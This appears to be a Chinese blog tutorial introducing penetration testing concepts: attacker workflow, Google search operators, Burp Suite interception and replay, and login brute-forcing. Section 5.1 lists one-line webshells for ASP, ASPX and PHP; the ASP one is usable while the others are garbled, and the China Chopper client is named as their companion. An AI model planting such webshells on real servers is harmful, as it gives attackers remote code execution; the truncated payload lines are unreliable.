渗透测试的概念和实战

精选30+云产品,助力企业轻松上云!>>> hot3.png

  • 目录
  • 1. 前言
  • 2. 常见web安全漏洞
  • 3. 思路
  • 3.1渗透测试思路
  • 3.2黑客攻击思路
  • 4. 暴力破解
  • 4.1谷歌黑语法
  • 4.1.1 黑语法inurl:搜索url包含指定字符串
  • 4.1.2 黑语法intitle:搜索网页中的标题名是否包含指定字符串
  • 4.1.3 黑语法intext:搜索网页正文内容是否包含指定字符串
  • 4.2Burpsuite常用功能
  • 4.2.1 拦截
  • 4.2.2抓包
  • 4.2.3改包
  • 4.2.4重放
  • 4.3后台暴力破解
  • 5. 上传木马或漏洞
  • 5.1一句话木马
  • 5.2上传漏洞

1.前言

渗透测试时通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。

2.常见web安全漏洞

渗透测试的概念和实战_第1张图片

3.思路

3.1渗透测试思路

信息收集->攻击测试

3.2黑客攻击思路

信息收集->攻击测试->提升权限->扩大成果->清除痕迹

4.暴力破解

4.1谷歌黑语法

4.1.1黑语法inurl:搜索url包含指定字符串

渗透测试的概念和实战_第2张图片

4.1.2黑语法intitle:搜索网页中的标题名是否包含指定字符串

渗透测试的概念和实战_第3张图片

4.1.3黑语法intext:搜索网页正文内容是否包含指定字符串

4.2Burpsuite常用功能

Burpsuite是Java开发的工具,所以需要安装好JDK,版本最好1.8以上

使用流程:

拦截->抓包->改包->重放

4.2.1 拦截

点击options配置代理服务器

渗透测试的概念和实战_第4张图片

浏览器也要配置,这里使用火狐浏览器,安装插件proxy或者谷歌hackbar

4.2.2抓包

配置好,刷新浏览器就能截取到数据包

渗透测试的概念和实战_第5张图片

但此时并没有达到拦截效果,需要开启Intercept,改为ON

渗透测试的概念和实战_第6张图片

4.2.3改包

刷新浏览器就能截取到数据包,并拦截

渗透测试的概念和实战_第7张图片

4.2.4重放

重放数据包

渗透测试的概念和实战_第8张图片

渗透测试的概念和实战_第9张图片

4.3后台暴力破解

对登陆数据包不存在的验证码、token等一次性验证进行破解。

5.上传木马或漏洞

5.1一句话木马

  • asp:<%eval request(pass)%>
  • aspx:<%@Page Language%>pass]. unsafe);%>
  • php:pass];);?>

5.2上传漏洞

软件:中国菜刀,配合木马使用

 

 

你可能感兴趣的:(渗透测试的概念和实战)